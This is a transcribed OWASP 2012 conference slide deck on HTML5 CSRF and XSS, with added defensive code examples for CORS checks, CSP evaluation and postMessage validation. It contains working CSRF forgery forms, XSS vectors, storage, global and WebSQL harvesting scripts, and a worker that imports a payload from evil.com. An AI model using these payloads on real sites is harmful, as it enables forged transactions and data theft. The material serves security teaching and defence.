1. XSS & CSRF with HTML5 - Attack, Exploit and Defense
   Shreeraj Shah, Blueinfy Solutions Pvt. Ltd., shreeraj.shah@blueinfy.net
   OWASP AppSecUSA 2012
   Copyright (c) The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
2. Who Am I?
   http://shreeraj.blogspot.com | shreeraj@blueinfy.com | http://www.blueinfy.com | Twitter @shreeraj
   Founder & Director: Blueinfy & iAppSecure Solutions Pvt. Ltd.
   Past experience: Net Square (Founder), Foundstone (R&D/Consulting), Chase (Middleware), IBM (Domino Dev)
   Interest: Web security research
   Published research
     Articles / Papers: SecurityFocus, O'Reilly, DevX, InformIT etc.
     Tools: DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
     Advisories: .Net, Java servers etc.
     Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.
   Books (Author)
     Web 2.0 Security - Defending Ajax, RIA and SOA
     Hacking Web Services
     Web Hacking
3. HTML5 VECTORS - ATTACK SURFACE
4. HTML5 - Attacks on the rise ... Evolution of HTML5
   1991 - HTML started (plain and simple)
   1996 - CSS & JavaScript (welcome to the world of XSS and browser security)
   2000 - XHTML1 (growing concerns and attacks on browsers)
   2005 - AJAX, XHR, DOM (attack cocktail and surface expansion)
   2009 - HTML5 (here we go ... new surface, architecture and defense) - HTML+CSS+JS
5. Modern Browser Model (layered diagram; the same stack applies on Mobile)
   Presentation: HTML5 + CSS, Silverlight, Flash, API (Media, Geo etc.) & Messaging, Plug-In
   Process & Logic: JavaScript, DOM/Events, Parser/Threads
   Network & Access: WebSQL, Cache, Storage, FileSystem, XHR 1 & 2, WebSocket, Plug-in Sockets, Browser Native Network Services
   Core Policies: SOP/CORS/Content-Security, Sandbox
6. HTML5 Architecture & Threat Model (diagram)
   User Interface -> Single DOM/Page Application (HTML/CSS, JavaScript) inside the Application Sandbox (Origin Policy)
   Cross-domain channels out of the sandbox: XHR, WebSockets, Messaging APIs -> Internet -> Target Application
   Client-side state and native hooks: Storage, WebSQL, IndexedDB; FileSystem, Cache APIs; Geolocation and other APIs; Native Application
7. CSRF WITH HTML5
8. CSRF Attack Vector (sequence diagram)
   Actors: Client/Victim Browser, Attacker's Site, Authentication Server, Web Store Application Server, Database Server
   1. Login success - session cookie set in the victim's browser
   2. Victim visits the attacker's site
   3. Attacker's page sends the CSRF payload
   4. CSRF attack fires with the live session - Success
   Successful exploitation relies on
     SOP bypass (the forged request crosses origins)
     Cookie Replay (the browser attaches the session cookie)
9. SOP bypass and Cookie Replay - Basic Type
   GET Request
     IMG SRC:    <img src="http://host/?command">
     SCRIPT SRC: <script src="http://host/?command">
     IFRAME SRC: <iframe src="http://host/?command">
   POST Request (a hidden form named "foo", auto-submitted)
     <script type="text/javascript" language="JavaScript">
       document.foo.submit();
     </script>
10. Streams - name/value pairs are gone ...
   Modern endpoints consume a raw request body rather than form-encoded name/value pairs: JSON, XML, JS-Script, JS-Object, JS-Array
11. CSRF injection - splitting and forcing ...
   <html><body>
   <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
     <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
   </FORM>
   <script>document.buy.submit();</script>
   </body></html>
   With ENCTYPE text/plain the browser posts the field as name=value, so the name and the value are glued into a body that reads <?xml version="1.0"?><methodCall>...</methodCall>: a complete XML-RPC call, delivered with the victim's cookies, to a server that never expected name/value pairs at all.
12. CSRF with XHR and CORS bypass (browser model diagram, as on slide 5)
13. XHR - Level 2 powering CSRF
   The XHR object of HTML5 is very powerful
   Allows interesting features like cross-origin requests and binary upload/download
   xhr.responseType can be set to "text", "arraybuffer", "document" and "blob"
   Also, for posting a data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc...
14. CORS & XHR - ingredients for CSRF
   Before HTML5 - cross-domain requests were not possible through XHR (SOP applied; the browser refused the call)
   HTML5 - allows cross-origin calls with XHR Level 2
   CORS - Cross Origin Resource Sharing has to be followed (OPTIONS/preflight calls for anything beyond a "simple" request)
   The server opts in by adding extra HTTP headers (Access-Control-Allow-Origin and a few others)
15. CORS based HTTP Headers
   Request
     Origin
     Access-Control-Request-Method (preflight)
     Access-Control-Request-Headers (preflight)
   Response
     Access-Control-Allow-Origin
     Access-Control-Allow-Credentials
     Access-Control-Expose-Headers
     Access-Control-Max-Age (preflight)
     Access-Control-Allow-Methods (preflight)
     Access-Control-Allow-Headers (preflight)
16. XHR - Stealth POST/GET
   CSRF - powered by CORS and XHR
     Hence a stealth channel and possible silent exploitation
     One-way CSRF with any stream, since XHR lets the browser send a raw body (XML, JSON, binary as well); the request is delivered even when the browser refuses to hand the response to the script
     Two-way CSRF (POST and read the response) when Access-Control-Allow-Origin is too permissive; note that a browser will not send credentials to an origin that answers with *, so reading an authenticated response needs the attacker's origin reflected together with Access-Control-Allow-Credentials: true
17. Exploiting the use case
   CORS preflight bypass - a POST whose Content-Type is text/plain, application/x-www-form-urlencoded or multipart/form-data is a "simple" request and is sent without a preflight, whatever the body actually contains
   Forcing cookie replay with "withCredentials"
   Internal network scanning and tunneling
   Information harvesting (internal crawling)
   Stealth browser shell - post XSS (Access-Control-Allow-Origin: *)
   Business functionality abuse (upload and binary streams)
18. CSRF with XHR/HTML5 (sequence diagram)
   User establishes a session: login request over HTTPS to the Authentication Server; session cookie returned to the Client/Victim Browser
19. CSRF with XHR/HTML5 (sequence diagram)
   Browser uses an XHR call from the application's JavaScript to place a buy order over HTTP (JSON services) on the Web Store Application Server; Success
20. CSRF with XHR/HTML5 (sequence diagram)
   Session is still live (user not yet logged out); victim visits the attacker's site, which sends the CSRF payload
   Leveraging the XHR call:
     Content-Type chosen to avoid the preflight
     "withCredentials" set to true so the cookie is replayed
21. CSRF & HTML5 (demo screenshot slide, no text)
22. CSRF with XHR/HTML5 (sequence diagram)
   Attacker's page: XHR initiates the HTTP buy request; Success - cookie replayed
   Hence, without the victim's consent or notice, a stealth HTTP request is generated and silent exploitation takes place
23. CSRF & HTML5 (demo screenshot slide, no text)
24. CSRF with XHR/HTML5 (sequence diagram)
   Browser has a multi-part form: business-layer function for uploading bulk orders; Success
25. CSRF/Upload - POC (screenshot slide, no text)
26. CSRF with XHR/HTML5 (sequence diagram)
   Attacker's page: XHR initiates the HTTP multi-part upload; Success - cookie replayed
   Hence, without the victim's consent or notice, a stealth HTTP upload takes place; silent exploitation ...
27. CSRF/Upload (screenshot slide, no text)
28. Internal Scan - not scan but crawl as well ... (diagram)
   Attacker's Site -(Internet)-> Client/Victim Browser -(Intranet)-> Internal Web Application, Internal HR Application, Internal Web/App Server, Internal Mail
   The CSRF payload gives the attacker a stealth channel into the intranet through the victim's browser
29. Internal Scan for CORS (screenshot slide, no text)
30. Scan and Defend
   Scan and look for
     Content-Type checking on the server side (does the JSON/XML endpoint accept a text/plain body?)
     CORS policy (which origins are allowed, and whether Access-Control-Allow-Credentials is set)
     Forms and uploads, with or without CSRF tokens
   Defense and Countermeasures
     Secure libraries for streaming HTML5/Web 2.0 content: reject bodies whose Content-Type is not the one the endpoint expects
     CSRF protections: per-session tokens on forms, uploads and XHR endpoints; a custom request header forces a preflight for every cross-origin caller
     Stronger CORS implementation: an explicit origin allowlist, never a wildcard together with credentials
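The preflight gap that slides 17 and 20 rely on, and the server-side gate that slide 30 recommends, as an added example; this is not code from the talk. It assumes a JSON buy endpoint on trade.example.com reached through an express-style request object with a headers map; ALLOWED_ORIGINS, gateJsonRequest and the X-Requested-With convention are assumptions, and the two sample requests are constructed.

```javascript
// Added example (not from the original slides): which cross-origin XHR calls
// skip the CORS preflight, and a server-side gate that closes the gap.
// Endpoint shape, origin allowlist and handler names are assumptions.

// Per the CORS rules a request is "simple" (sent with no OPTIONS preflight)
// when the method is GET/HEAD/POST, every script-set header is safelisted,
// and Content-Type is one of three form-style media types.
const SIMPLE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFELISTED_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SIMPLE_CONTENT_TYPES = new Set(["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]);
// Headers the browser attaches itself; a script cannot set them, so they do
// not count towards the "author-set headers" test.
const BROWSER_SET_HEADERS = new Set(["origin", "host", "cookie", "referer", "content-length"]);

function mediaType(value) {
  // "text/plain; charset=utf-8" -> "text/plain"
  return String(value).split(";")[0].trim().toLowerCase();
}

// True when the browser would deliver this request without a preflight, i.e.
// the server sees it (cookie included, if withCredentials) before any CORS
// policy is consulted. `headers` is what the server receives.
function skipsPreflight(method, headers) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return false;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (BROWSER_SET_HEADERS.has(lower)) continue;
    if (!SAFELISTED_HEADERS.has(lower)) return false;
    if (lower === "content-type" && !SIMPLE_CONTENT_TYPES.has(mediaType(value))) return false;
  }
  return true;
}

// Server-side gate for the JSON order endpoint (assumed handler):
// 1. the body must really be application/json, so a text/plain CSRF body
//    that merely looks like JSON is rejected before it is parsed;
// 2. a custom header must be present, which forces a preflight on every
//    cross-origin caller (the header name is a common convention, assumed here);
// 3. if an Origin header is present it must be on the allowlist; the reply
//    echoes that exact origin and never "*" together with credentials.
const ALLOWED_ORIGINS = new Set(["https://trade.example.com"]); // assumption

function gateJsonRequest(req) {
  const h = Object.fromEntries(Object.entries(req.headers).map(([k, v]) => [k.toLowerCase(), v]));
  if (mediaType(h["content-type"] || "") !== "application/json") {
    return { ok: false, status: 415, reason: "content-type must be application/json" };
  }
  if (h["x-requested-with"] !== "XMLHttpRequest") {
    return { ok: false, status: 403, reason: "missing anti-CSRF custom header" };
  }
  const origin = h["origin"];
  if (origin !== undefined && !ALLOWED_ORIGINS.has(origin)) {
    return { ok: false, status: 403, reason: "origin not allowed" };
  }
  const cors = origin
    ? { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true", "Vary": "Origin" }
    : {};
  return { ok: true, status: 200, cors };
}

// Constructed sample requests: the attacker's stealth POST from slide 20 and a
// legitimate call made by the application's own JavaScript.
const attackerPost = {
  method: "POST",
  headers: { "Content-Type": "text/plain", "Origin": "http://attacker.example" },
  body: '{"symbol":"MSFT","qty":100}',
};
const legitimatePost = {
  method: "POST",
  headers: { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "Origin": "https://trade.example.com" },
  body: '{"symbol":"MSFT","qty":100}',
};
```

The attacker's request is delivered with no preflight and the cookie replayed, exactly as on slide 20; it is the Content-Type check, not CORS, that stops it. The legitimate client is not a simple request, so a cross-origin caller would hit the preflight, where the origin allowlist is enforced.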
31. XSS WITH HTML5
32. XSS with HTML5 (tags, attributes and events) (browser model diagram, as on slide 5)
33. HTML5 - Tags/Attributes/Events
   Tags - media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form controls (keys)
   Attributes - form, submit, autofocus, sandbox, manifest, rel etc.
   Events/Objects - Navigation (_self), editable content, Drag-Drop APIs, pushState (History) etc.
34. XSS variants
   Media tags - examples
     <video><source onerror="javascript:alert(1)">
     <video onerror="javascript:alert(1)"><source>
35. XSS variants
   Exploiting autofocus
     <input autofocus onfocus=alert(1)>
     <select autofocus onfocus=alert(1)>
     <textarea autofocus onfocus=alert(1)>
     <keygen autofocus onfocus=alert(1)>
36. XSS variants
   Form & Button etc.
     <form id="test" /><button form="test" formaction="javascript:alert(1)">test
     <form><button formaction="javascript:alert(1)">test
   Etc ... and more ... Nice HTML5 XSS cheat sheet (http://html5sec.org/)
37. Scan and Defend
   Scan and look for
     Reflected or Persistent XSS spots with HTML5 tags
   Defense and Countermeasures
     Add the HTML5 tags, attributes and event handlers to your blacklist (a blacklist alone will always lag behind html5sec.org; treat it as a supplement)
     Standard XSS protections by contextual output encoding
38. CSP in Action - HTML5 defense ...
   Content Security Policy - defending the browser against possible post-attack scenarios
     Based on Origin (SOP is the key)
     Allows a whitelisting mechanism for what "to do" and "not to do"
     It is possible to send a violation report back to the application when a policy violation takes place
     Implemented by extra HTTP headers; at the time of the talk the header name was browser-specific: X-WebKit-CSP (Safari/Chrome), X-Content-Security-Policy (Firefox); the standard name is Content-Security-Policy
39. Blocking Scripts
   Content-Security-Policy: script-src 'self'
     Only allows script from the page's own origin (the quotes are part of the keyword)
   Other mechanisms
     'unsafe-inline' - inline scripts and inline event handlers are blocked unless this keyword is present
     'unsafe-eval' - eval()-type calls (eval, new Function, string arguments to setTimeout) are blocked unless this keyword is present
   Post-XSS defense can be crafted: an injected <script> block or onerror= handler does not execute under script-src 'self'
40. Controlling Browser
   connect-src - controlling WebSocket, XHR etc.
   frame-src - sources the page may load into its own frames (note: it does not stop other sites framing this page; for ClickJacking use X-Frame-Options or the later frame-ancestors directive)
   object-src - Flash, Silverlight etc.
   media-src - controlling audio and video
   img-src / style-src - image and style sources
   default-src https:; - locking every other fetch to SSL only
41. Example - Persistent XSS injected, response carrying CSP
   HTTP/1.1 200 OK
   Date: Wed, 12 Sep 2012 14:40:31 GMT
   Server: Microsoft-IIS/6.0
   X-Powered-By: ASP.NET
   X-WebKit-CSP: script-src self
   X-AspNet-Version: 2.0.50727
   Cache-Control: private
   Content-Type: text/html; charset=utf-8
   Content-Length: 6146
   Note: the keyword has to be written 'self' with the quotes; a bare self is parsed as a host name, so the header as shown allows no script at all, the application's own included.
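An added example, not part of the slides, that evaluates the directives of slides 39 to 41 the way a browser would before the policy ships: does a given script, image or object load pass, and is inline or eval()-based code still allowed? The two policy strings and the page URL are constructed; the evaluator covers 'self', 'none', '*', scheme sources and host sources, which is enough for the directives on these slides but fewer source forms than a real browser.

```javascript
// Added example (not from the original slides): a minimal evaluator for the
// CSP directives on slides 39-41. Policies and URLs below are constructed.

// "script-src 'self' https://cdn.example; img-src *" -> Map(directive -> sources)
function parsePolicy(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

// Fetch directives fall back to default-src when absent; no directive at all
// means no restriction (null).
function sourcesFor(directives, name) {
  if (directives.has(name)) return directives.get(name);
  if (directives.has("default-src")) return directives.get("default-src");
  return null;
}

function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// Does one source expression match a resource URL loaded by pageUrl?
function sourceMatches(expr, resourceUrl, pageUrl) {
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "*") return true;
  if (e === "'self'") return originOf(resourceUrl) === originOf(pageUrl);
  if (/^[a-z][a-z0-9+.-]*:$/.test(e)) return new URL(resourceUrl).protocol === e; // scheme-source, e.g. https:
  // host-source: optional scheme, optional leading *. wildcard, optional port
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:]+)(?::(\d+))?/.exec(e);
  if (!m) return false;
  const r = new URL(resourceUrl);
  const [, scheme, wildcard, host, port] = m;
  if (scheme && r.protocol !== scheme + ":") return false;
  if (port && r.port !== port) return false;
  return wildcard ? r.hostname.endsWith("." + host) : r.hostname === host;
}

// Would the browser fetch resourceUrl for this directive under this policy?
function allowsResource(policy, directive, resourceUrl, pageUrl) {
  const sources = sourcesFor(parsePolicy(policy), directive);
  if (sources === null) return true;
  return sources.some((s) => sourceMatches(s, resourceUrl, pageUrl));
}

// Inline code and eval are governed by script-src keywords: once any
// script-src (or default-src) is present, inline needs 'unsafe-inline' and
// eval()-type calls need 'unsafe-eval'.
function allowsInlineScript(policy) {
  const sources = sourcesFor(parsePolicy(policy), "script-src");
  return sources === null || sources.map((s) => s.toLowerCase()).includes("'unsafe-inline'");
}
function allowsEval(policy) {
  const sources = sourcesFor(parsePolicy(policy), "script-src");
  return sources === null || sources.map((s) => s.toLowerCase()).includes("'unsafe-eval'");
}

// Constructed policies: the slide-41 intent written correctly ('self' quoted),
// plus the slide-40 directives, and a looser policy that still permits inline code.
const PAGE = "https://shop.example.com/orders";
const STRICT = "script-src 'self'; connect-src 'self'; object-src 'none'; default-src https:";
const LOOSE = "script-src 'self' 'unsafe-inline' https://cdn.example.net";
```

Under STRICT the persistent payloads of slides 34 to 36 are dead: they are inline handlers, and 'unsafe-inline' is absent; a remote <script src> only loads from the page's own origin. LOOSE keeps the CDN working but leaves every injected inline handler executable, which is the trade-off to surface in review.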
42. Storage extraction with XSS (browser model diagram, as on slide 5)
43. Web Storage Extraction
   Before HTML5 the browser had one place to store data - the Cookie (limited in size, and replayed on every request)
   HTML5 - Storage API provided (Local and Session)
   Can hold globally scoped application state across page loads
   http://www.w3.org/TR/webstorage/
44. Web Storage Extraction
   It is possible to steal the contents through XSS or any injected JavaScript
   Session hijacking - HttpOnly is of no use here: a token kept in Web Storage is readable by script by design
   getItem and setItem calls
   XSS the box and scan through storage
45. Blind storage enumeration
   if (localStorage.length) {
     console.log(localStorage.length);
     for (var i = 0; i < localStorage.length; i++) {   // key(i) walks only stored entries; for-in would also list Storage's own methods
       var key = localStorage.key(i);
       console.log(key);
       console.log(localStorage.getItem(key));
     }
   }
   The above code extracts every storage variable
46. File System Storage
   HTML5 provides a virtual file system with filesystem APIs (the sandboxed FileSystem API, vendor-prefixed in WebKit at the time)
     window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;
   It becomes a full-blown local file system for the application, inside the origin sandbox
   It empowers the application
47. File System Storage
   It provides a temporary or persistent file system
     var filesys;                                   // handle kept for later reads and writes
     function catcherror(e) { console.log(e); }     // error callback (left undefined on the slide)
     function init() {
       window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) {
         filesys = filesystem;
       }, catcherror);
     }
   The app can have a full filesystem in place now.
48. Sensitive information in the filesystem
   Assuming the app is creating a profile on the local system (screenshot)
49. Extraction through XSS
   Once you have an entry point - game over! (screenshot)
50. Single DOM/One Page App - XSS
   Applications run with a "rich" DOM
   JavaScript sets several variables and parameters while loading - GLOBALS
   They hold sensitive information; what if they are GLOBAL and remain for the life of the application?
   They can be retrieved with XSS
   HTTP requests and responses go through JavaScript (XHR) - what about those vars?
51. Blind Enumeration
   for (i in window) {
     obj = window[i];
     try {
       if (typeof(obj) == "string") {
         console.log(i);
         console.log(obj.toString());
       }
     } catch (ex) {}
   }
52. Global Sensitive Information Extraction from DOM
   HTML5 apps run on a single DOM
   They carry several key global variables, objects and arrays, e.g.
     var arrayGlobals = ["my@email.com", "12141hewvsdr9321343423mjfdvint", "test.com"];
   Post-DOM-based exploitation is possible, harvesting all these values.
53. Global Sensitive Information Extraction from DOM
   for (i in window) {
     obj = window[i];
     if (obj !== null && obj !== undefined) {      // the original tested (obj!=null||obj!=undefined), which is always true
       var type = typeof(obj);
       if (type == "object" || type == "string") {
         console.log("Name:" + i);
         try {
           my = JSON.stringify(obj);                // throws on cyclic objects such as window itself
           console.log(my);
         } catch (ex) {}
       }
     }
   }
54. Scan and Defend
   Scan and look for
     Scanning storage (localStorage, sessionStorage, the FileSystem sandbox, globals on window)
   Defense and Countermeasures
     Do not store sensitive information in localStorage or in globals; keep it in closures or on the server
     XSS protection
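The window scan of slides 51 and 53 run against two ways of holding the same session token, as an added example (not code from the talk), to show what the slide-54 advice buys. A plain object stands in for window and a small Storage-like object for localStorage so it runs outside a browser; the variable names, the token value and the api helper are constructed.

```javascript
// Added example (not from the original slides): blind global/storage
// enumeration versus a closure-held secret. Root objects stand in for window;
// names and the token value are constructed.

// Attacker-side primitive from slides 51/53: walk every property of the root
// and collect string values and JSON-serialisable objects by name.
function enumerateGlobals(root) {
  const found = {};
  for (const name of Object.keys(root)) {
    let value;
    try { value = root[name]; } catch (e) { continue; }       // some getters throw
    if (typeof value === "string") {
      found[name] = value;
    } else if (value !== null && typeof value === "object") {
      try { found[name] = JSON.stringify(value); } catch (e) { /* cyclic: skip */ }
    }
  }
  return found;
}

// Same idea over a Storage-like object (length/key/getItem, as localStorage).
function enumerateStorage(storage) {
  const found = {};
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    found[key] = storage.getItem(key);
  }
  return found;
}

// Vulnerable pattern: the app parks the token on the global object, which is
// what a top-level "var sessionToken = ..." does in a browser.
function setupVulnerableApp(root) {
  root.sessionToken = "12141hewvsdr9321343423mjfdvint";   // constructed token
  root.arrayGlobals = ["my@email.com", "test.com"];
}

// Hardened pattern: the secret lives in a closure and only the operation that
// needs it is exposed; no enumerable property on the root carries the value.
function setupHardenedApp(root) {
  const sessionToken = "12141hewvsdr9321343423mjfdvint";   // constructed token
  root.api = Object.freeze({
    // assumed helper: builds an authenticated request at call time
    fetchWithAuth: (path) => ({ path, headers: { Authorization: "Bearer " + sessionToken } }),
  });
}

// True if any harvested value contains the secret.
function leaks(found, secret) {
  return Object.values(found).some((v) => typeof v === "string" && v.includes(secret));
}

// Minimal Storage stand-in so the example runs outside a browser (constructed).
function fakeStorage(entries) {
  const keys = Object.keys(entries);
  return { get length() { return keys.length; }, key: (i) => keys[i], getItem: (k) => entries[k] };
}
```

The closure stops blind harvesting, not abuse: script running in the origin can still call api.fetchWithAuth with the victim's ambient authority, which is why XSS protection stays on the slide-54 list alongside the storage advice.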
55. SQLi & Blind Enumeration through XSS (browser model diagram, as on slide 5)
56. SQL Injection
   WebSQL shipped alongside HTML5 and gives the browser itself a SQL database (SQLite underneath); note that the W3C stopped work on the WebSQL draft in 2010 and it never became part of the HTML5 standard.
   Allows one-time data loading and offline browsing capabilities.
   Causes security concern and potential injection points: queries built by string concatenation on the client are injectable from any untrusted input, and the whole database is reachable from any script running in the origin.
   Its methods (openDatabase, transaction, executeSql) are callable from any such script
57. SQL Injection
   Through JavaScript one can harvest the entire local database.
   Example (screenshot)
58. Blind WebSQL Enumeration
   var dbo;
   var table;
   var usertable;
   for (i in window) {
     obj = window[i];
     try {
       if (obj.constructor.name == "Database") {
         dbo = obj;
         obj.transaction(function(tx) {
           tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [], function(tx, results) {
             table = results;
             // the original checked table.rows after the loop, before the
             // asynchronous query had returned; the check belongs in the callback
             if (table.rows.length > 1)
               usertable = table.rows.item(1).name;
           }, null);
         });
       }
     } catch (ex) {}
   }
59. Blind WebSQL Enumeration
   We run through all objects on window and pick the one whose constructor is "Database"
   We issue a SELECT directly against the sqlite_master catalogue table
   We grab the 1st table, leaving WebKit's own metadata table at the 0th entry
60. Blind WebSQL Enumeration (screenshot slide, no text)
61. Web Messaging and Worker Injection (browser model diagram, as on slide 5)
62. Web Messaging
   HTML5 has a new inter-frame communication system called Web Messaging. With a postMessage() call the parent frame/domain can talk to the iframe, and the iframe can reply.
   The iframe can be loaded cross-domain. Hence it creates issues - data/information validation, and data leakage by cross-posting is possible
   worker.webkitPostMessage - faster, transferable objects
63. Web Messaging - Scenario
   If postMessage() is called with target origin * then whoever has loaded the page in an iframe (or opened it) receives the message, and messaging can be hijacked
   Also, if the listener does not check event.origin against a fixed value, the frame accepts messages from any domain - again an issue
   The incoming stream needs to be checked before it reaches innerHTML or eval()
   An iframe or Web Worker can glue two streams together - same domain or cross domain
64. Origin check (screenshot slide, no text)
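The two listener shapes slide 63 contrasts, and the sender that names its target origin instead of *, written as an added example (not the talk's code) so they can be exercised with constructed MessageEvent-like objects outside a browser. ORDER_ORIGIN, the order message format and the fake element/window stand-ins are assumptions.

```javascript
// Added example (not from the original slides): vulnerable vs. hardened
// postMessage handling. Origin, message format and stand-ins are constructed.

const ORDER_ORIGIN = "https://trade.example.com"; // the only frame we trust (assumption)

// Vulnerable: no origin check and the payload goes straight to innerHTML.
// Any page that can frame (or open) this one can push markup into its DOM.
function makeVulnerableListener(sink) {
  return function onMessage(event) {
    sink.innerHTML = event.data;          // DOM XSS sink
    return true;
  };
}

// Hardened: drop foreign origins, require a structured message, validate the
// fields, and only ever write text into the DOM.
function makeHardenedListener(sink, allowedOrigin = ORDER_ORIGIN) {
  return function onMessage(event) {
    if (event.origin !== allowedOrigin) return false;   // drop silently, never reply
    let msg;
    try { msg = typeof event.data === "string" ? JSON.parse(event.data) : event.data; }
    catch (e) { return false; }
    if (!msg || typeof msg !== "object" || msg.type !== "order" || typeof msg.symbol !== "string") return false;
    if (!/^[A-Z]{1,6}$/.test(msg.symbol) || !Number.isInteger(msg.qty) || msg.qty <= 0) return false;
    sink.textContent = `Order: ${msg.symbol} x ${msg.qty}`;  // text, never markup
    return true;
  };
}

// Sending side: name the target origin instead of "*", so the browser drops
// the message if the frame has meanwhile been navigated somewhere else.
function sendOrder(frameWindow, order, targetOrigin = ORDER_ORIGIN) {
  frameWindow.postMessage(JSON.stringify({ type: "order", ...order }), targetOrigin);
}

// Minimal stand-ins so the example runs outside a browser (constructed).
function fakeElement() { return { innerHTML: "", textContent: "" }; }
function fakeWindow() {
  const sent = [];
  return { sent, postMessage: (data, origin) => sent.push({ data, origin }) };
}
```

In a real page the listener is registered with window.addEventListener("message", handler, false); the same handler shape applies to data coming back from a Web Worker, which has no origin to check but must still be validated before it reaches innerHTML.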
65. Web Worker - Hacks!
   Web Workers bring threading to HTML pages using JavaScript
   No need to simulate concurrency with setTimeout(), setInterval(), XMLHttpRequest callbacks and event handlers
   Totally async and well supported
     [initialize] var worker = new Worker("task.js");
     [messaging]  worker.postMessage(data);
66. Web Worker - Hacks! (diagram)
   Web Page: current DOM, XHR, Location, Navigator etc. on the JavaScript runtime
   Web Worker: background thread on the same page with its own scope and objects (Regex, Array, JSON etc.); no DOM access; talks to the page by messaging
   Both sit on the Browser Platform
67. Web Worker - Hacks!
   Security issues
     The Worker constructor refuses cross-domain worker scripts (http:, https:, javascript:, data: - no)
     It has some typical issues
       It allows the use of XHR; hence in-domain and CORS requests are possible from the worker
       It can cause DoS - if an attacker gets a stream of JavaScript to run in the worker thread. The worker has no access to the parent DOM though
       Message validation is needed - else DOM-based XSS when the page writes worker output into the DOM
68. Web Worker - Hacks! Example
   <html>
   <button onclick="Read()">Read Last Message</button>
   <button onclick="stop()">Stop</button>
   <output id="result"></output>
   <script>
     function Read() {
       worker.postMessage({cmd: 'read', msg: 'last'});
     }
     function stop() {
       worker.postMessage({cmd: 'stop', msg: 'stop it'});
       alert("Worker stopped");
     }
     var worker = new Worker('message.js');
     worker.addEventListener('message', function(e) {
       document.getElementById('result').innerHTML = e.data;   // worker output written as markup: the DOM XSS sink
     }, false);
   </script>
   </html>
69. Web Workers - Hacks!
   Possible to cause XSS
     Running script
     Passing a hidden payload
   Also, web workers can embed a silently running JS file that can be controlled.
   Can be a tool for payload delivery and control within the browser framework
   importScripts("http://evil.com/payload.js") - a worker can run a cross-domain script; importScripts is not bound by the same-origin restriction the Worker constructor applies
70. Scan and Defend
   Scan and look for
     JavaScript scanning
     Messaging and Worker implementation
     DOM calls
     Use of eval(), document.* calls etc.
   Defense and Countermeasures
     Same-origin listening is a must for messaging events: check event.origin and send with an explicit target origin
     Secure JavaScript coding
71. APIs ...
   A few other HTML5 APIs are interesting from a security standpoint
     File APIs - allow local file access and can be mixed with ClickJacking and other attacks to obtain client files.
     Drag-Drop APIs - exploiting self-XSS and a few other tricks, hijacking cookies ...
   Lots more to explore and defend ...
72. Resources/References
   http://www.html5rocks.com/en/ (solid stuff)
   https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet (OWASP)
   http://html5sec.org/ (quick cheat sheet)
   http://html5security.org/ (good resources)
   http://blog.kotowicz.net/ (interesting work)
73. Conclusion and Questions
   http://shreeraj.blogspot.com | shreeraj@blueinfy.com | http://www.blueinfy.com